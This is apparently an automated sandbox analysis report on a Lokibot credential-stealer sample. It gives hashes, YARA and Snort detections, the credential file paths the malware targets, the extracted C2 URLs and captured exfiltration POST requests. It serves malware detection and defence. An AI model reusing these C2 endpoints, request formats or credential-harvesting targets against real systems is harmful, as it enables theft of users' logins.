Windows Analysis Report
kVijllv0Yl

Overview

General Information

Sample Name: kVijllv0Yl (renamed file extension from none to exe)
Analysis ID: 562515
MD5: 6997de404fb7e798aecc2c8a14fd2f12
SHA1: 121a437542ba544f975847429dda439719800bb9
SHA256: f36a543cfcddf76b99df925bf70b22d560792d1059387e00bfe782bffd6e8a2b
Tags: 32, exe, Loki, trojan

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • kVijllv0Yl.exe (PID: 2312 cmdline: "C:\Users\user\Desktop\kVijllv0Yl.exe" MD5: 6997DE404FB7E798AECC2C8A14FD2F12)
    • kVijllv0Yl.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\kVijllv0Yl.exe" MD5: 6997DE404FB7E798AECC2C8A14FD2F12)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Source | Rule | Description | Author | Strings
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen
  • 0x17936:$f1: FileZilla\recentservers.xml
  • 0x17976:$f2: FileZilla\sitemanager.xml
  • 0x15be6:$b2: Mozilla\Firefox\Profiles
  • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x15afa:$s4: logins.json
  • 0x169a4:$s6: wand.dat
  • 0x15424:$a1: username_value
  • 0x15414:$a2: password_value
  • 0x15a5f:$a3: encryptedUsername
  • 0x15acc:$a3: encryptedUsername
  • 0x15a72:$a4: encryptedPassword
  • 0x15ae0:$a4: encryptedPassword
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Loki_1 | Loki Payload | kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
Source | Rule | Description | Author | Strings
0.2.kVijllv0Yl.exe.1ade0000.3.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
0.2.kVijllv0Yl.exe.1ade0000.3.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0.2.kVijllv0Yl.exe.1ade0000.3.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x133fc:$a2: last_compatible_version
0.2.kVijllv0Yl.exe.1ade0000.3.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x123ff:$des3: 68 03 66 00 00
  • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.0.kVijllv0Yl.exe.400000.9.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
No Sigma rule has matched

AV Detection

Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Source: kVijllv0Yl.exe | Virustotal: Detection: 40%
Source: kVijllv0Yl.exe | ReversingLabs: Detection: 47%
Source: http://secure01-redirect.net/gc15/fre.php | Avira URL Cloud: Label: malware
Source: secure01-redirect.net | Virustotal: Detection: 21%
Source: http://secure01-redirect.net/gc15/fre.php | Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll | Virustotal: Detection: 27%
Source: kVijllv0Yl.exe | Joe Sandbox ML: detected
Source: 1.0.kVijllv0Yl.exe.400000.3.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.kVijllv0Yl.exe.400000.1.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.kVijllv0Yl.exe.400000.0.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.kVijllv0Yl.exe.400000.2.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: kVijllv0Yl.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_00402630 FindFirstFileA,0_2_00402630
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

Networking

Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49769 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49769 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49770 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49770 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 185.185.69.76:80
Source: Traffic | Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49771
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Joe Sandbox View | ASN Name: SPRINTHOSTRU SPRINTHOSTRU
Source: global traffic | HTTP traffic detected:
  POST /gc15/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: secure01-redirect.net
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 7A2E941E
  Content-Length: 196
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /gc15/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: secure01-redirect.net
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 7A2E941E
  Content-Length: 169
  Connection: close
          Source: kVijllv0Yl.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: kVijllv0Yl.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: kVijllv0Yl.exe, 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://secure01-redirect.net/gc15/fre.php
          Source: kVijllv0Yl.exe, kVijllv0Yl.exe, 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
          Source: unknownHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 196Connection: close
          Source: unknownDNS traffic detected: queries for: secure01-redirect.net
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00404ED4 recv,1_2_00404ED4
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

          System Summary

          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: kVijllv0Yl.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
